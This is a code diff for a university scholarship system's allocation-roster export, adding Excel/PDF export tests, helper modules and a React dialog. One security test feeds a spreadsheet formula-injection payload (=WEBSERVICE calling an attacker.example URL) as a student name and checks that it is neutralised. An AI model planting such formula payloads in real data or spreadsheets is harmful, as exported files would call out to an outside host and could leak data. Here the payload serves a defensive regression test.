+    def test_neighbouring_identity_codes_are_not_flagged(self):
+        """Negative boundary: only 17 is 陸生. 3=僑生 and 4=外籍生 get a separate
+        承辦人 warning elsewhere, not this column."""
+        for identity in (1, 2, 3, 4, 5, 6, 7, 8, 9, 30):
+            assert derive_cross_strait_check(_student_data(std_identity=identity)) == CHECK_CLEAR, identity
+
+
+class TestStudyStatusCheck:
+    def test_suspension_flags(self):
+        assert derive_study_status_check(_student_data(trm_studystatus=4)) == CHECK_FLAGGED
+
+    def test_deferred_admission_flags(self):
+        assert derive_study_status_check(_student_data(std_studingstatus=9)) == CHECK_FLAGGED
+
+    def test_forfeited_admission_flags(self):
+        assert derive_study_status_check(_student_data(trm_studystatus=10)) == CHECK_FLAGGED
+
+    def test_active_student_is_clear(self):
+        assert derive_study_status_check(_student_data()) == CHECK_CLEAR
+
+    def test_missing_both_statuses_is_unverifiable(self):
+        assert derive_study_status_check({}) == CHECK_UNVERIFIABLE
+
+    def test_either_status_field_alone_is_read(self):
+        assert derive_study_status_check({"std_studingstatus": 1}) == CHECK_CLEAR
+        assert derive_study_status_check({"trm_studystatus": 4, "std_studingstatus": 1}) == CHECK_FLAGGED
+
+
+# --------------------------------------------------------------------------- #
+# Snapshot field rendering
+# --------------------------------------------------------------------------- #
+
+
+class TestFormatEnrollmentDate:
+    def test_first_term_maps_to_september(self):
+        assert format_enrollment_date_roc({"std_enrollyear": 113, "std_enrollterm": 1}) == "113.09.01"
+
+    def test_second_term_maps_to_february(self):
+        assert format_enrollment_date_roc({"std_enrollyear": 113, "std_enrollterm": 2}) == "113.02.01"
+
+    def test_missing_year_renders_empty(self):
+        assert format_enrollment_date_roc({}) == ""
+
+    def test_numeric_string_term_is_coerced(self):
+        """student_data is raw SIS JSON, so "1" is possible — a bare == 1 would
+        print February for a September enrolment."""
+        assert format_enrollment_date_roc({"std_enrollyear": "113", "std_enrollterm": "1"}) == "113.09.01"
+        assert format_enrollment_date_roc({"std_enrollyear": "113", "std_enrollterm": "2"}) == "113.02.01"
+
+    def test_string_zero_year_renders_empty_not_zero_date(self):
+        assert format_enrollment_date_roc({"std_enrollyear": "0", "std_enrollterm": 1}) == ""
+
+    def test_uncoercible_term_falls_to_february_branch(self):
+        # Pinned elsewhere: only term 1 is September, anything else February.
+        assert format_enrollment_date_roc({"std_enrollyear": 113, "std_enrollterm": "abc"}) == "113.02.01"
+
+    def test_missing_term_defaults_to_september(self):
+        assert format_enrollment_date_roc({"std_enrollyear": 113}) == "113.09.01"
+
+    def test_uncoercible_year_renders_empty(self):
+        assert format_enrollment_date_roc({"std_enrollyear": "民國113", "std_enrollterm": 1}) == ""
+
+    def test_grid_helper_renders_the_same_literal_string(self):
+        """The grid and this export must render identically.
+
+        Asserts the literal both sides must produce — comparing the two callables
+        to each other would pass trivially while the delegation holds, which is
+        exactly the regression (a re-inlined copy) this guards against.
+        """
+        from app.services.manual_distribution_service import ManualDistributionService
+
+        svc = ManualDistributionService(db=None)
+        for sd, expected in [
+            ({"std_enrollyear": 112, "std_enrollterm": 1}, "112.09.01"),
+            ({"std_enrollyear": "113", "std_enrollterm": "2"}, "113.02.01"),
+            ({}, ""),
+        ]:
+            assert svc._format_enrollment_date(sd) == expected
+            assert format_enrollment_date_roc(sd) == expected
+
+
+class TestBuildRecipientRow:
+    def test_full_snapshot_maps_every_column(self):
+        row = _sample_row()
+        assert row.seq == 1
+        assert row.college == "工學院"
+        assert row.department == "土木工程學系"
+        assert row.student_name == "王小美"
+        assert row.nationality == "中華民國"
+        assert row.gender == "女"
+        assert row.master_school == "台灣大學工學院土木工程學系"
+        assert row.enrollment_date == "113.02.01"
+        assert row.student_number == "312345611"
+        assert row.employment_check == CHECK_CLEAR
+        assert row.cross_strait_check == CHECK_CLEAR
+        assert row.study_status_check == CHECK_CLEAR
+
+    def test_master_school_falls_back_to_sis_highest_school(self):
+        row = build_recipient_row(1, _application(_student_data()))
+        assert row.master_school == "台灣大學"
+
+    def test_college_falls_back_to_code_mapping(self):
+        row = build_recipient_row(1, _application(_student_data(trm_academyname="")))
+        assert row.college == "工學院"
+
+    def test_gender_code_one_is_male(self):
+        assert build_recipient_row(1, _application(_student_data(std_sex=1))).gender == "男"
+
+    def test_non_string_snapshot_values_do_not_crash_the_export(self):
+        """student_data is raw SIS JSON: a documented-as-string field can arrive
+        as a number. .strip() on that would 500 the WHOLE export."""
+        row = build_recipient_row(
+            1,
+            _application({"trm_depname": 1550, "std_cname": 12345, "std_stdcode": 312345611, "std_nation": 1}),
+        )
+        assert row.department == "1550"
+        assert row.student_name == "12345"
+        assert row.student_number == "312345611"
+        assert row.nationality == "1"
+
+    def test_none_student_data_renders_empty_and_unverifiable(self):
+        row = build_recipient_row(3, _application(None))
+        assert row.seq == 3
+        assert row.student_name == ""
+        assert row.enrollment_date == ""
+        assert row.employment_check == CHECK_UNVERIFIABLE
+        assert row.cross_strait_check == CHECK_UNVERIFIABLE
+        assert row.study_status_check == CHECK_UNVERIFIABLE
+
+
+# --------------------------------------------------------------------------- #
+# Workbook rendering
+# --------------------------------------------------------------------------- #
+
+
+class TestBuildWorkbook:
+    def _load(self, payload: bytes):
+        return load_workbook(io.BytesIO(payload))
+
+    def test_one_sheet_per_group_named_label_and_year(self):
+        svc = ManualDistributionExportService()
+        wb = self._load(
+            svc.build_workbook(
+                groups=[
+                    _group([_sample_row()], label="國科會", code="nstc", year=114),
+                    _group([], label="教育部", code="moe_1w", year=113),
+                ],
+                title="T",
+            )
+        )
+        assert wb.sheetnames == ["國科會_114", "教育部_113"]
+
+    def test_duplicate_sheet_names_are_deduped(self):
+        svc = ManualDistributionExportService()
+        wb = self._load(
+            svc.build_workbook(
+                groups=[
+                    _group([], label="國科會", code="nstc", year=114),
+                    _group([], label="國科會", code="nstc", year=114),
+                ],
+                title="T",
+            )
+        )
+        assert wb.sheetnames == ["國科會_114", "國科會_114_2"]
+
+    def test_two_row_header_layout_and_merges(self):
+        svc = ManualDistributionExportService()
+        ws = self._load(svc.build_workbook(groups=[_group([_sample_row()])], title="T")).active
+        # 序號 spans both header rows; group labels sit on row 2; column labels on row 3.
+        assert ws.cell(row=2, column=1).value == "序號"
+        assert ws.cell(row=3, column=1).value is None
+        assert ws.cell(row=2, column=2).value == "基本資料"
+        assert [ws.cell(row=3, column=c).value for c in range(2, 8)] == [
+            "學院",
+            "系所",
+            "姓名",
+            "國籍",
+            "性別",
+            "碩士畢業院/校/系所",
+        ]
+        assert ws.cell(row=2, column=8).value == "學籍資料"
+        assert ws.cell(row=3, column=9).value == "學號"
+        assert ws.cell(row=2, column=10).value == "請領資格檢核"
+        assert ws.cell(row=2, column=11).value == AUTO_CHECK_GROUP
+        assert ws.cell(row=3, column=11).value == HEADERS[10]
+
+    def test_data_row_renders_expected_values(self):
+        svc = ManualDistributionExportService()
+        ws = self._load(svc.build_workbook(groups=[_group([_sample_row()])], title="T")).active
+        values = [ws.cell(row=4, column=c).value for c in range(1, 14)]
+        assert values == [
+            1,  # 序號 keeps native int typing
+            "工學院",
+            "土木工程學系",
+            "王小美",
+            "中華民國",
+            "女",
+            "台灣大學工學院土木工程學系",
+            "113.02.01",
+            "312345611",
+            None,  # 請領資格檢核 left for the 承辦人 (empty cell reads back None)
+            CHECK_CLEAR,
+            CHECK_CLEAR,
+            CHECK_CLEAR,
+        ]
+
+    def test_malicious_student_name_is_neutralized(self):
+        """SECURITY: openpyxl writes a leading '=' as a LIVE formula and 姓名 comes from SIS."""
+        svc = ManualDistributionExportService()
+        row = _sample_row(std_cname='=WEBSERVICE("https://attacker.example/x")')
+        ws = self._load(svc.build_workbook(groups=[_group([row])], title="T")).active
+        value = ws.cell(row=4, column=4).value
+        assert not str(value).startswith("="), f"formula injection not neutralized: {value!r}"
+
+    def test_zero_groups_still_saves_a_readable_workbook(self):
+        """A zero-sheet openpyxl workbook saves as a corrupt file — guard emits
+        one empty roster sheet instead."""
+        svc = ManualDistributionExportService()
+        wb = self._load(svc.build_workbook(groups=[], title="T"))
+        assert wb.sheetnames == ["分發名單"]
+        assert wb.active.cell(row=2, column=1).value == "序號"
+
+    def test_sheet_name_invalid_chars_are_replaced(self):
+        svc = ManualDistributionExportService()
+        wb = self._load(svc.build_workbook(groups=[_group([], label="A/B:C", year=None)], title="T"))
+        assert wb.sheetnames == ["A_B_C"]
+
+
+# --------------------------------------------------------------------------- #
+# PDF rendering
+# --------------------------------------------------------------------------- #
+
+
+def _pdf_text(payload: bytes) -> str:
+    from pypdf import PdfReader
+
+    return "\n".join(page.extract_text() or "" for page in PdfReader(io.BytesIO(payload)).pages)
+
+
+class TestBuildPdf:
+    def test_returns_a_pdf_with_multiple_groups(self):
+        svc = ManualDistributionExportService()
+        payload = svc.build_pdf(
+            groups=[
+                _group([_sample_row(), _sample_row(seq=2)]),
+                _group([_sample_row()], label="教育部", code="moe_1w", year=113),
+            ],
+            title="114學年度分發名單",
+        )
+        assert payload.startswith(b"%PDF")
+
+    def test_pdf_actually_contains_the_title_headers_and_row_data(self):
+        """Magic bytes alone would pass for a renderer that drops every data row."""
+        svc = ManualDistributionExportService()
+        row = _sample_row(std_cname="陳測試", std_stdcode="312999888")
+        text = _pdf_text(svc.build_pdf(groups=[_group([row])], title="114學年度分發名單"))
+        assert "114學年度分發名單" in text
+        assert "國科會" in text  # group heading
+        assert "序號" in text and "基本資料" in text  # both header rows
+        assert "陳測試" in text  # student row
+        assert "312999888" in text
+        assert "113.02.01" in text
+
+    def test_pdf_paginates_one_page_run_per_group(self):
+        from pypdf import PdfReader
+
+        svc = ManualDistributionExportService()
+        payload = svc.build_pdf(
+            groups=[
+                _group([_sample_row(std_cname="甲生")], label="國科會", code="nstc", year=114),
+                _group([_sample_row(std_cname="乙生")], label="教育部", code="moe_1w", year=113),
+            ],
+            title="T",
+        )
+        reader = PdfReader(io.BytesIO(payload))
+        assert len(reader.pages) == 2
+        assert "甲生" in (reader.pages[0].extract_text() or "")
+        assert "乙生" in (reader.pages[1].extract_text() or "")
+
+    def test_pdf_renders_every_row_of_a_long_group(self):
+        svc = ManualDistributionExportService()
+        rows = [_sample_row(seq=i, std_cname=f"學生{i:03d}") for i in range(1, 61)]
+        text = _pdf_text(svc.build_pdf(groups=[_group(rows)], title="T"))
+        for i in (1, 30, 60):
+            assert f"學生{i:03d}" in text, f"row {i} missing from the PDF"
+
+    def test_zero_groups_does_not_raise(self):
+        svc = ManualDistributionExportService()
+        assert svc.build_pdf(groups=[], title="空").startswith(b"%PDF")
+
+    def test_xml_special_chars_do_not_break_rendering(self):
+        svc = ManualDistributionExportService()
+        row = _sample_row(std_cname="A & B <C>")
+        assert svc.build_pdf(groups=[_group([row])], title="T & <U>").startswith(b"%PDF")
+
+    def test_overlong_cell_shrinks_instead_of_raising_layout_error(self):
+        """A reportlab Table cannot split one row across pages — KeepInFrame must
+        absorb a pathological 4000-char free-text value."""
+        svc = ManualDistributionExportService()
+        row = _sample_row(std_cname="超長姓名" * 1000)
+        assert svc.build_pdf(groups=[_group([row])], title="T").startswith(b"%PDF")

--- a/backend/app/utils/export_download.py
+++ b/backend/app/utils/export_download.py
@@ -1,0 +1,27 @@
+"""Shared HTTP-download helpers for binary file exports.
+
+Every export endpoint returns a ``StreamingResponse`` with an RFC 5987
+``Content-Disposition`` (filenames are CJK, so plain ``filename=`` breaks) and
+an explicit ``Content-Length``. These constants and the filename scrubber were
+originally private to ``college_review/application_summary_export``; they moved
+here when the manual-distribution 分發名單 export — a different endpoint
+package — needed them too.
+"""
+
+import re
+
+XLSX_MEDIA_TYPE = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
+ZIP_MEDIA_TYPE = "application/zip"
+
+# Characters not allowed in cross-platform filenames
+_UNSAFE_FILENAME_RE = re.compile(r'[\\/:*?"<>|]')
+
+
+def sanitise_filename_part(value: str) -> str:
+    """Make one filename component safe on Windows/macOS/Linux.
+
+    Replaces the illegal characters with ``_`` and trims surrounding
+    whitespace; an empty (or whitespace-only) result becomes ``untitled`` so a
+    download never gets a nameless component.
+    """
+    return _UNSAFE_FILENAME_RE.sub("_", value).strip() or "untitled"

--- a/backend/app/utils/student_snapshot_fields.py
+++ b/backend/app/utils/student_snapshot_fields.py
@@ -1,0 +1,62 @@
+"""Coercion and rendering helpers for ``Application.student_data`` fields.
+
+``student_data`` is the raw SIS API payload, stored verbatim: nothing in the
+write path coerces it (``StudentService`` returns ``result["data"][0]`` as-is and
+``StudentSnapshotSchema`` is never used to validate it). The university API
+returns its code fields as **strings** (see ``mock-student-api/README.md``), so
+every read has to tolerate int, float or numeric-string input.
+
+This is a LEAF module by design: the manual-distribution service and the roster
+renderers both need these helpers, and putting them here keeps reportlab and
+openpyxl out of the core service's import graph.
+"""
+
+from __future__ import annotations
+
+from typing import Any, Optional
+
+
+def as_int(value: Any) -> Optional[int]:
+    """SIS code as an int, or ``None`` when it cannot be read as one.
+
+    Goes via ``float`` so a JSON number that arrived as ``1.0`` (or ``"1.0"``)
+    still reads as code 1 — ``int("1.0")`` raises, which would silently downgrade
+    a real verdict to "unverifiable". ``bool`` is rejected because ``True`` is not
+    a SIS code.
+    """
+    if value is None or isinstance(value, bool):
+        return None
+    try:
+        return int(float(str(value).strip()))
+    except (TypeError, ValueError):
+        return None
+
+
+def as_text(value: Any) -> str:
+    """Trimmed text for any snapshot value.
+
+    A field the schema documents as a string can arrive as a number (e.g. a
+    numeric 系所代碼). Calling ``.strip()`` on that raises AttributeError and
+    fails the whole caller, so coerce instead.
+    """
+    if value is None:
+        return ""
+    return value.strip() if isinstance(value, str) else str(value)
+
+
+def format_enrollment_date_roc(student_data: dict) -> str:
+    """首次註冊入學日期 as ROC calendar (民國年.月.日).
+
+    Single source of truth for the manual-distribution grid and the 分發名單
+    export, so the two can never render the same student differently.
+
+    Semantics: only term 1 is September (a missing term defaults to 1, anything
+    else — including an uncoercible value — falls to February), and a
+    missing/zero/unreadable year renders "".
+    """
+    enroll_year = as_int(student_data.get("std_enrollyear"))
+    raw_term = student_data.get("std_enrollterm")
+    enroll_term = 1 if raw_term is None else as_int(raw_term)
+    # Approximate: term 1 = September, term 2 = February
+    month = "09" if enroll_term == 1 else "02"
+    return f"{enroll_year}.{month}.01" if enroll_year else ""

--- a/frontend/components/admin/manual-distribution/DistributionSummaryDialog.tsx
+++ b/frontend/components/admin/manual-distribution/DistributionSummaryDialog.tsx
@@ -1,0 +1,215 @@
+"use client";
+
+import { useState } from "react";
+import { Download, Eye, FileSpreadsheet, FileText, Loader2 } from "lucide-react";
+import { toast } from "sonner";
+import { Button } from "@/components/ui/button";
+import {
+  DropdownMenu,
+  DropdownMenuContent,
+  DropdownMenuItem,
+  DropdownMenuTrigger,
+} from "@/components/ui/dropdown-menu";
+import {
+  exportDistributionSummary,
+  resolveCollegeName,
+  type DistributionSummaryResult,
+} from "@/lib/api/modules/manual-distribution";
+import { triggerBlobDownload } from "@/lib/utils/download";
+
+interface DistributionSummaryDialogProps {
+  summary: DistributionSummaryResult | null;
+  isLoading: boolean;
+  /** Academies-first code→name map shared with the panel (buildCollegeNameMap). */
+  collegeNames: Map<string, string>;
+  /** Short display label for a sub-type code (panel's getSubTypeShortName). */
+  getSubTypeLabel: (subType: string) => string;
+  scholarshipTypeId: number;
+  academicYear: number | undefined;
+  semester: string | undefined;
+  onClose: () => void;
+}
+
+/**
+ * The 分發結果名單 modal: allocated students grouped by sub-type × 年度配額,
+ * with 匯出 Excel / PDF backed by GET /manual-distribution/distribution-summary/export
+ * (the backend export reads through the same loader as the list shown here).
+ */
+export function DistributionSummaryDialog({
+  summary,
+  isLoading,
+  collegeNames,
+  getSubTypeLabel,
+  scholarshipTypeId,
+  academicYear,
+  semester,
+  onClose,
+}: DistributionSummaryDialogProps) {
+  const [exporting, setExporting] = useState(false);
+
+  const hasRows = !!summary && summary.groups.length > 0;
+
+  const handleExport = async (format: "xlsx" | "pdf") => {
+    // The modal only opens after a load with valid selections, but the guard
+    // keeps a stale/cleared selection from sending academic_year=undefined.
+    // Say so rather than no-opping — a dead button reads as a broken export.
+    if (typeof academicYear !== "number" || !Number.isFinite(academicYear) || !semester) {
+      toast.error("請先選擇學年度與學期");
+      return;
+    }
+    setExporting(true);
+    try {
+      // Statically imported: this module is already in the initial chunk via
+      // resolveCollegeName above, so a dynamic import would split nothing. The
+      // lazy-import rule in frontend/CLAUDE.md targets heavy libs (xlsx,
+      // react-pdf); rendering happens server-side here.
+      const result = await exportDistributionSummary({
+        scholarshipTypeId,
+        academicYear,
+        semester,
+        format,
+      });
+      triggerBlobDownload(result);
+      toast.success("匯出成功");
+    } catch (e) {
+      toast.error(e instanceof Error ? e.message : "匯出失敗");
+    } finally {
+      setExporting(false);
+    }
+  };
+
+  return (
+    <div className="fixed inset-0 z-50 bg-black/50 flex items-center justify-center p-4">
+      <div className="bg-white rounded-lg shadow-lg max-w-4xl w-full max-h-[85vh] flex flex-col">
+        <div className="p-4 border-b border-slate-200 flex items-center justify-between">
+          <h2 className="text-lg font-bold text-slate-800 flex items-center gap-2">
+            <Eye className="h-5 w-5" />
+            分發結果名單
+          </h2>
+          <button
+            onClick={onClose}
+            className="text-slate-400 hover:text-slate-600 text-2xl leading-none"
+          >
+            ×
+          </button>
+        </div>
+        <div className="flex-1 overflow-y-auto p-4">
+          {isLoading ? (
+            <div className="flex justify-center py-12">
+              <Loader2 className="h-6 w-6 animate-spin text-blue-600" />
+            </div>
+          ) : !hasRows ? (
+            <p className="text-center text-slate-500 py-8">
+              尚未完成分發，或無已分配的學生
+            </p>
+          ) : (
+            <div className="space-y-6">
+              <div className="text-sm text-slate-600">
+                共 {summary.total_allocated} 位學生已分發到{" "}
+                {summary.groups.length} 個獎學金類別
+              </div>
+              {summary.groups.map(group => (
+                <div
+                  // Groups are keyed server-side by (sub_type, allocation_config_id),
+                  // and two configs can share an academic_year — so the year alone
+                  // is not unique. Include the config id.
+                  key={`${group.sub_type}-${group.allocation_config_id}-${group.allocation_year}`}
+                  className="border border-slate-200 rounded-lg overflow-hidden"
+                >
+                  <div className="bg-slate-50 px-4 py-2 flex items-center justify-between">
+                    <div className="flex items-center gap-2">
+                      <span className="font-semibold text-sm text-slate-800">
+                        {getSubTypeLabel(group.sub_type)}
+                      </span>
+                      <span className="text-xs text-slate-500 font-mono">
+                        ({group.sub_type})
+                      </span>
+                      <span className="text-xs bg-blue-100 text-blue-700 px-2 py-0.5 rounded">
+                        {group.allocation_year} 年度配額
+                      </span>
+                    </div>
+                    <span className="text-sm font-medium text-slate-700">
+                      {group.count} 人
+                    </span>
+                  </div>
+                  <table className="w-full text-sm">
+                    <thead>
+                      <tr className="border-b border-slate-100 text-xs text-slate-500">
+                        <th className="text-left px-4 py-2">排名</th>
+                        <th className="text-left px-4 py-2">學號</th>
+                        <th className="text-left px-4 py-2">姓名</th>
+                        <th className="text-left px-4 py-2">學院</th>
+                        <th className="text-left px-4 py-2">系所</th>
+                      </tr>
+                    </thead>
+                    <tbody>
+                      {[...group.students]
+                        .sort((a, b) => a.rank_position - b.rank_position)
+                        .map(student => (
+                          <tr
+                            key={student.ranking_item_id}
+                            className="border-b border-slate-50 hover:bg-slate-50"
+                          >
+                            <td className="px-4 py-1.5 text-slate-400">
+                              {student.college_rejected ? (
+                                <span className="text-red-600">N</span>
+                              ) : (
+                                student.rank_position
+                              )}
+                            </td>
+                            <td className="px-4 py-1.5 font-mono text-xs">
+                              {student.student_id}
+                            </td>
+                            <td className="px-4 py-1.5 font-medium">
+                              {student.student_name}
+                            </td>
+                            <td className="px-4 py-1.5">
+                              {resolveCollegeName(
+                                collegeNames,
+                                student.college_code,
+                                student.college_name
+                              )}
+                            </td>
+                            <td className="px-4 py-1.5 text-slate-600">
+                              {student.department_name}
+                            </td>
+                          </tr>
+                        ))}
+                    </tbody>
+                  </table>
+                </div>
+              ))}
+            </div>
+          )}
+        </div>
+        <div className="p-4 border-t border-slate-200 flex justify-between items-center">
+          <DropdownMenu>
+            <DropdownMenuTrigger asChild>
+              <Button variant="outline" size="sm" disabled={exporting || !hasRows}>
+                {exporting ? (
+                  <Loader2 className="mr-2 h-4 w-4 animate-spin" />
+                ) : (
+                  <Download className="mr-2 h-4 w-4" />
+                )}
+                匯出
+              </Button>
+            </DropdownMenuTrigger>
+            <DropdownMenuContent align="start">
+              <DropdownMenuItem onClick={() => handleExport("xlsx")}>
+                <FileSpreadsheet className="mr-2 h-4 w-4" />
+                匯出 Excel
+              </DropdownMenuItem>
+              <DropdownMenuItem onClick={() => handleExport("pdf")}>
+                <FileText className="mr-2 h-4 w-4" />
+                匯出 PDF
+              </DropdownMenuItem>
+            </DropdownMenuContent>
+          </DropdownMenu>
+          <Button variant="outline" onClick={onClose}>
+            關閉
+          </Button>
+        </div>
+      </div>
+    </div>
+  );
+}

--- a/frontend/components/admin/manual-distribution/DistributionSummaryDialog.tsx
+++ b/frontend/components/admin/manual-distribution/DistributionSummaryDialog.tsx
@@ -144,7 +144,17 @@ export function DistributionSummaryDialog({
                     </thead>
                     <tbody>
                       {[...group.students]
-                        .sort((a, b) => a.rank_position - b.rank_position)
+                        // Same order the export numbers 序號 by: 學院 then 名次.
+                        // rank_position is scoped to ONE college's ranking, so
+                        // sorting on it alone interleaves colleges and 序號 N in
+                        // the file would point at a different row than the Nth
+                        // row here.
+                        .sort(
+                          (a, b) =>
+                            (a.college_code || "").localeCompare(
+                              b.college_code || ""
+                            ) || a.rank_position - b.rank_position
+                        )
                         .map(student => (
                           <tr
                             key={student.ranking_item_id}

--- a/frontend/components/admin/manual-distribution/ManualDistributionPanel.tsx
+++ b/frontend/components/admin/manual-distribution/ManualDistributionPanel.tsx
@@ -15,11 +15,11 @@ import type {
   DistributionHistoryRecord,
   RestoreRequest,
   DistributionSummaryResult,
-  DistributionSummaryGroup,
   AllocationSuggestion,
   DistributionState,
   ReleaseChainItem,
 } from "@/lib/api/modules/manual-distribution";
+import { DistributionSummaryDialog } from "./DistributionSummaryDialog";
 import {
   buildCollegeNameMap,
   getSavedAllocation,
@@ -1218,10 +1218,8 @@ export function ManualDistributionPanel({
                 <Download className="h-4 w-4 mr-1" />
                 匯出申請總表
               </Button>
-              <Button variant="outline" size="sm" disabled>
-                <Download className="h-4 w-4 mr-1" />
-                匯出 Excel
-              </Button>
+              {/* 分發名單 (受獎名冊) 的 Excel/PDF 匯出在「查看分發名單」對話框內
+                  ——與畫面上的名單同一份資料來源，見 DistributionSummaryDialog。 */}
               <Button
                 variant="outline"
                 size="sm"
@@ -2255,123 +2253,18 @@ export function ManualDistributionPanel({
         </div>
       </div>
 
-      {/* History Dialog */}
       {/* Distribution Summary Dialog */}
       {showDistributionSummary && (
-        <div className="fixed inset-0 z-50 bg-black/50 flex items-center justify-center p-4">
-          <div className="bg-white rounded-lg shadow-lg max-w-4xl w-full max-h-[85vh] flex flex-col">
-            <div className="p-4 border-b border-slate-200 flex items-center justify-between">
-              <h2 className="text-lg font-bold text-slate-800 flex items-center gap-2">
-                <Eye className="h-5 w-5" />
-                分發結果名單
-              </h2>
-              <button
-                onClick={() => setShowDistributionSummary(false)}
-                className="text-slate-400 hover:text-slate-600 text-2xl leading-none"
-              >
-                ×
-              </button>
-            </div>
-            <div className="flex-1 overflow-y-auto p-4">
-              {isLoadingSummary ? (
-                <div className="flex justify-center py-12">
-                  <Loader2 className="h-6 w-6 animate-spin text-blue-600" />
-                </div>
-              ) : !distributionSummary ||
-                distributionSummary.groups.length === 0 ? (
-                <p className="text-center text-slate-500 py-8">
-                  尚未完成分發，或無已分配的學生
-                </p>
-              ) : (
-                <div className="space-y-6">
-                  <div className="text-sm text-slate-600">
-                    共 {distributionSummary.total_allocated} 位學生已分發到{" "}
-                    {distributionSummary.groups.length} 個獎學金類別
-                  </div>
-                  {distributionSummary.groups.map(group => (
-                    <div
-                      key={`${group.sub_type}-${group.allocation_year}`}
-                      className="border border-slate-200 rounded-lg overflow-hidden"
-                    >
-                      <div className="bg-slate-50 px-4 py-2 flex items-center justify-between">
-                        <div className="flex items-center gap-2">
-                          <span className="font-semibold text-sm text-slate-800">
-                            {getSubTypeShortName(
-                              group.sub_type,
-                              group.sub_type
-                            )}
-                          </span>
-                          <span className="text-xs text-slate-500 font-mono">
-                            ({group.sub_type})
-                          </span>
-                          <span className="text-xs bg-blue-100 text-blue-700 px-2 py-0.5 rounded">
-                            {group.allocation_year} 年度配額
-                          </span>
-                        </div>
-                        <span className="text-sm font-medium text-slate-700">
-                          {group.count} 人
-                        </span>
-                      </div>
-                      <table className="w-full text-sm">
-                        <thead>
-                          <tr className="border-b border-slate-100 text-xs text-slate-500">
-                            <th className="text-left px-4 py-2">排名</th>
-                            <th className="text-left px-4 py-2">學號</th>
-                            <th className="text-left px-4 py-2">姓名</th>
-                            <th className="text-left px-4 py-2">學院</th>
-                            <th className="text-left px-4 py-2">系所</th>
-                          </tr>
-                        </thead>
-                        <tbody>
-                          {group.students
-                            .sort((a, b) => a.rank_position - b.rank_position)
-                            .map(student => (
-                              <tr
-                                key={student.ranking_item_id}
-                                className="border-b border-slate-50 hover:bg-slate-50"
-                              >
-                                <td className="px-4 py-1.5 text-slate-400">
-                                  {student.college_rejected ? (
-                                    <span className="text-red-600">N</span>
-                                  ) : (
-                                    student.rank_position
-                                  )}
-                                </td>
-                                <td className="px-4 py-1.5 font-mono text-xs">
-                                  {student.student_id}
-                                </td>
-                                <td className="px-4 py-1.5 font-medium">
-                                  {student.student_name}
-                                </td>
-                                <td className="px-4 py-1.5">
-                                  {resolveCollegeName(
-                                    collegeNames,
-                                    student.college_code,
-                                    student.college_name
-                                  )}
-                                </td>
-                                <td className="px-4 py-1.5 text-slate-600">
-                                  {student.department_name}
-                                </td>
-                              </tr>
-                            ))}
-                        </tbody>
-                      </table>
-                    </div>
-                  ))}
-                </div>
-              )}
-            </div>
-            <div className="p-4 border-t border-slate-200 flex justify-end">
-              <Button
-                variant="outline"
-                onClick={() => setShowDistributionSummary(false)}
-              >
-                關閉
-              </Button>
-            </div>
-          </div>
-        </div>
+        <DistributionSummaryDialog
+          summary={distributionSummary}
+          isLoading={isLoadingSummary}
+          collegeNames={collegeNames}
+          getSubTypeLabel={code => getSubTypeShortName(code, code)}
+          scholarshipTypeId={scholarshipTypeId}
+          academicYear={selectedAcademicYear}
+          semester={selectedSemester}
+          onClose={() => setShowDistributionSummary(false)}
+        />
       )}
 
       {showHistoryDialog && (

--- a/frontend/components/admin/manual-distribution/__tests__/DistributionSummaryDialog.test.tsx
+++ b/frontend/components/admin/manual-distribution/__tests__/DistributionSummaryDialog.test.tsx
@@ -1,0 +1,208 @@
+import { render, screen, fireEvent, waitFor } from "@testing-library/react";
+import userEvent from "@testing-library/user-event";
+import { DistributionSummaryDialog } from "../DistributionSummaryDialog";
+import type { DistributionSummaryResult } from "@/lib/api/modules/manual-distribution";
+
+// Radix's DropdownMenu drives its open state from Pointer Events, which jsdom
+// does not implement — without these stubs the trigger never opens and every
+// export assertion below fails for an environment reason, not a code one.
+beforeAll(() => {
+  Object.defineProperty(Element.prototype, "hasPointerCapture", {
+    value: () => false,
+    writable: true,
+  });
+  Object.defineProperty(Element.prototype, "releasePointerCapture", {
+    value: () => {},
+    writable: true,
+  });
+  Object.defineProperty(Element.prototype, "setPointerCapture", {
+    value: () => {},
+    writable: true,
+  });
+  Object.defineProperty(Element.prototype, "scrollIntoView", {
+    value: () => {},
+    writable: true,
+  });
+});
+
+/** Open the 匯出 dropdown and click one of its items. */
+async function clickExportItem(label: string) {
+  const user = userEvent.setup();
+  await user.click(screen.getByRole("button", { name: /匯出/ }));
+  await user.click(await screen.findByText(label));
+}
+
+const mockExport = jest.fn();
+const mockTriggerBlobDownload = jest.fn();
+const mockToast = { success: jest.fn(), error: jest.fn() };
+
+jest.mock("@/lib/api/modules/manual-distribution", () => ({
+  exportDistributionSummary: (...args: unknown[]) => mockExport(...args),
+  resolveCollegeName: (
+    names: Map<string, string>,
+    code: string,
+    fallback?: string
+  ) => (code ? (names.get(code) ?? code) : fallback || "未知"),
+}));
+
+jest.mock("@/lib/utils/download", () => ({
+  triggerBlobDownload: (...args: unknown[]) => mockTriggerBlobDownload(...args),
+}));
+
+jest.mock("sonner", () => ({
+  toast: {
+    success: (...args: unknown[]) => mockToast.success(...args),
+    error: (...args: unknown[]) => mockToast.error(...args),
+  },
+}));
+
+const summary = (): DistributionSummaryResult => ({
+  total_allocated: 2,
+  groups: [
+    {
+      sub_type: "nstc",
+      allocation_config_id: 42,
+      allocation_year: 114,
+      count: 2,
+      students: [
+        {
+          ranking_item_id: 2,
+          application_id: 20,
+          student_name: "李二",
+          student_id: "312345602",
+          college_code: "I",
+          college_name: "工學院",
+          department_name: "土木工程學系",
+          rank_position: 2,
+        },
+        {
+          ranking_item_id: 1,
+          application_id: 10,
+          student_name: "王一",
+          student_id: "312345601",
+          college_code: "I",
+          college_name: "工學院",
+          department_name: "土木工程學系",
+          rank_position: 1,
+        },
+      ],
+    },
+  ],
+});
+
+const defaults = {
+  collegeNames: new Map([["I", "工學院"]]),
+  getSubTypeLabel: (code: string) => (code === "nstc" ? "國科會" : code),
+  scholarshipTypeId: 7,
+  academicYear: 114,
+  semester: "yearly",
+  onClose: jest.fn(),
+};
+
+beforeEach(() => {
+  jest.clearAllMocks();
+  mockExport.mockResolvedValue({ blob: new Blob(["x"]), filename: "分發名單.xlsx" });
+});
+
+describe("DistributionSummaryDialog", () => {
+  it("renders each group's students sorted by rank without mutating the prop array", () => {
+    const data = summary();
+    const original = data.groups[0].students;
+    render(<DistributionSummaryDialog {...defaults} summary={data} isLoading={false} />);
+
+    const rows = screen.getAllByRole("row").slice(1); // drop the header row
+    expect(rows[0]).toHaveTextContent("王一");
